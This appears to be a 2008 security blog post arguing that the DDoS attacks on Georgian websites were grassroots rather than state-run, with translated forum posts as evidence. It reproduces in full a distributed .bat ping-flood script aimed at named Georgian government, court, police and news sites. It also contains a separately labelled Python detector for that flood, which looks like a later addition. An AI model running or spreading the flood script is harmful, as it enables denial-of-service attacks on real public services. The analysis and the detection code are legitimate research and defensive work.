Tuesday, August 19, 2008

Evidence that Georgia DDOS attacks are "populist" in nature

I've speculated to the press a couple times that the attacks against websites in Georgia are most likely populist in nature rather than state sponsored. It seemed time to provide more complete evidence.

If you aren't familiar with the conflict between Georgia and South Ossetia, the Wikipedia article actually has some interesting, if slanted, background. Since 1992, South Ossetia has been trying to secede, with its most recent vote on the issue in 2006. On April 13, 2007 Georgia gave in and allowed the self-named "Alternative Government of South Ossetia" to be recognized as the "Provisional Administration of South Ossetia", and on May 10, Dmitry Sanakoyev was appointed the head of the administrative entity.

After Georgia attempted to join NATO in April of 2008, Senators Joseph Biden and Richard Lugar, who were co-sponsors of the Senate Resolution 523, which declared the support of the US Senate for allowing both the Ukraine and the Republic of Georgia to join, issued a press release regarding Russia's strongly voiced opposition to the move. According to the press release, President Putin had gone so far as to threaten nuclear war on the Ukraine if they joined NATO, and promised to "subvert the territorial integrity of Georgia" if it continued in its efforts.

On June 4, 2008, Biden and Lugar passed another Senate Resolution, this time condemning Russia for their use of "threatening rhetoric, military brinksmanship, and economic boycotts to intimidate and undermine the Georgian government."

This Biden Press Release explains:

In April, the Russian Federation established official ties with the Georgian breakaway regions of Abkhazia and South Ossetia in order to intentionally subvert reconciliation efforts between these regions and the Georgian government. Russia has also engaged in a series of provocative military stunts including shooting down a Georgian plane.
The United States must lead an intensive international diplomatic counter-offensive against Russia's efforts to destabilize Georgia and the region.

The scenario that has unfolded on the Internet is very similar to the one that preceded the Russian-Estonian DDOS attacks in April and May of 2007. At that time, President Putin's opposition to Estonia's removal of the Bronze Soldier was spread in the Moscow Times and other places, speaking of how the Estonians had betrayed Putin's own father, a member of the NKVD sabotage unit who had been in Estonia fighting the Nazis. After the will of the President was made known, the cause was taken up by Russian youth organizations, fiercely loyal to their president and well-versed in the ways of the Internet. Groups like Nashi, Young Russia, Mestniye and others distributed scripts on the web forums their members frequented, inviting them to participate in an "Internet War" (Интернет-войне) and providing them with a simple script which could be run as a ".bat" file on their computers, causing their machines to participate in a DDOS against Estonia.

A script almost exactly like that one is what I've now found on hundreds of Russian-language webpages, where readers are being encouraged to run it on their own computers; it is being distributed in archive files with names such as "ossetia.zip".

"Yandex Clubs", similar to Facebook Groups, have been started, with names such as:

Разбираем Политику - Война в Грузии!

which translates to: "We dismantle politics - War in Georgia!"

That group currently has 937 members and is led by three moderators who use the names:

"intersolar-direct" (Intersolar works for an advertising company of the same name).

"politican" (you can see Politican's photo album here: http://fotki.yandex.ru/users/rfvxeuf/)

"agjul-2000" (who collects photos of children and puppies when he's not declaring Cyber wars, see: http://ajgul-2000.ya.ru/?ncrnd=4295 )

A search on "yandex.ru", which is perhaps similar to a Russian-language Yahoo, found hundreds of webpages with posts containing "ping commands" designed to DDOS the site "president.gov.ge". You can do the search yourself like this:


or even on google.ru:


© bash

Хочешь поддержать Южную Осетию в Интернет-войне?
Вставь в текстовый файл следующий текст

(Gar-translation: Want to support South Ossetia in the Internet-war?
Insert the following into a text file)

@echo off
@echo Call this file (MSK) 18:00, 20:00
@echo Thanks for support of South Ossetia! Please, transfer this file to the friends!

start ping newsgeorgia.ru -t -l 1024
start ping apsny.ge -t -l 1024
start ping nukri.org -t -l 1024
start ping opentext.org.ge -t -l 1024
start ping messenger.com.ge -t -l 1024
start ping president.gov.ge -t -l 1024
start ping government.gov.ge -t -l 1024
start ping parliament.ge -t -l 1024
start ping nsc.gov.ge -t -l 1024
start ping constcourt.gov.ge -t -l 1024
start ping supremecourt.ge -t -l 1024
start ping cec.gov.ge -t -l 1024
start ping nbg.gov.ge -t -l 1024
start ping nplg.gov.ge -t -l 1024
start ping police.ge -t -l 1024
start ping mod.gov.ge -t -l 1024
start ping mes.gov.ge -t -l 1024
start ping mfa.gov.ge -t -l 1024
start ping iberiapac.ge -t -l 1024
start ping mof.ge -t -l 1024

Сохрани с расширением.bat и запускай!

(Gar-translation: Now save with a ".bat" extension and launch!)

The script above was being distributed on a Russian hacker board on August 12th.
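One way a network defender could spot this crowd-sourced ping flood in firewall logs. This is an added example, not code from the original post; the log format, addresses and threshold are constructed for illustration. The signature it looks for is the fixed 1024-byte echo-request payload produced by `ping -l 1024`, arriving at one destination from many unrelated sources.

```python
"""Detect the crowd-sourced ICMP flood pattern produced by the .bat script above.

Constructed firewall log lines (not from the original post). Each line records
one ICMP echo request as: timestamp src dst proto type payload_len
"""
from collections import defaultdict

SAMPLE_LOG = """\
2008-08-12T18:00:01 10.1.1.5 198.51.100.10 icmp echo-request 1024
2008-08-12T18:00:01 10.2.7.9 198.51.100.10 icmp echo-request 1024
2008-08-12T18:00:02 10.3.3.3 198.51.100.10 icmp echo-request 1024
2008-08-12T18:00:02 10.1.1.5 198.51.100.10 icmp echo-request 1024
2008-08-12T18:00:03 10.4.4.4 198.51.100.10 icmp echo-request 1024
2008-08-12T18:00:03 10.9.9.9 198.51.100.20 icmp echo-request 32
2008-08-12T18:00:04 10.9.9.9 198.51.100.20 icmp echo-request 32
"""


def parse_log(text):
    """Yield (src, dst, payload_len) for each well-formed ICMP echo-request line."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6 or fields[3] != "icmp" or fields[4] != "echo-request":
            continue
        yield fields[1], fields[2], int(fields[5])


def find_script_floods(text, payload_len=1024, min_sources=3):
    """Return {dst: sorted distinct sources} for every destination that receives
    payload_len-byte echo requests from at least min_sources distinct hosts.

    A fixed 1024-byte payload (Windows `ping -l 1024`) coming from many
    unrelated sources is the fingerprint of a distributed, script-driven crowd
    rather than a single noisy host. The threshold is a constructed value;
    tune it to the normal ICMP baseline of the monitored network.
    """
    sources = defaultdict(set)
    for src, dst, size in parse_log(text):
        if size == payload_len:
            sources[dst].add(src)
    return {dst: sorted(s) for dst, s in sources.items() if len(s) >= min_sources}


if __name__ == "__main__":
    for dst, srcs in find_script_floods(SAMPLE_LOG).items():
        print(f"{dst}: {len(srcs)} distinct sources sending 1024-byte pings")
```

Once a destination is flagged, the distinct-source list is what lets an operator distinguish a crowd of home PCs from a single misconfigured monitor and choose an ICMP rate limit at the edge accordingly.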

Here is a rather typical posting . . . I apologize for my poor translation, using a computer for that:


The poster says:

I ask the administrators not to delete my communication. From the Soviet Information ministry, 8 August 2008: Georgian troops DISLOYALLY attacked South Ossetia completely annihilating the city of Tskhinvali. Under the rubble of the blasted buildings reside THOUSANDS OF PEOPLE and HUNDREDS OF RUSSIANS! They cannot leave because the city is filled with snipers! It is time for us to join the war! Georgia has begun a war with Russia and is spreading false information from their government. Call to settle this with a DDOS-attack

He goes on to list a script similar to the one above which would attack eight different government websites in Georgia. So, this poster's plea to his readers is - Russians are dying - the Georgian government is lying about it - we can stop them from spreading these lies by DDOS'ing the government websites.

Other posters have used other forms of argument to convince their fellow Russians this is the right course of action, but I would consider this "typical behavior".

So . . . to get back to the question "is this a state-sponsored cyber attack?" I'm not sure we agree on what that question means. If the question is "is the Russian government attacking the websites of Georgia", I think it's fairly obvious the answer is "No."

Has the government used its voice in the media to create a popular tension, where the average citizen believes that allowing Georgia to join NATO will weaken "Common Russia", as the phrase is being used, and that splintering Georgia through support for South Ossetia will prevent that? "Certainly!"

And have some of those citizens started a grass-roots DDOS attack by distribution of scripts such as the one above? "Yes."
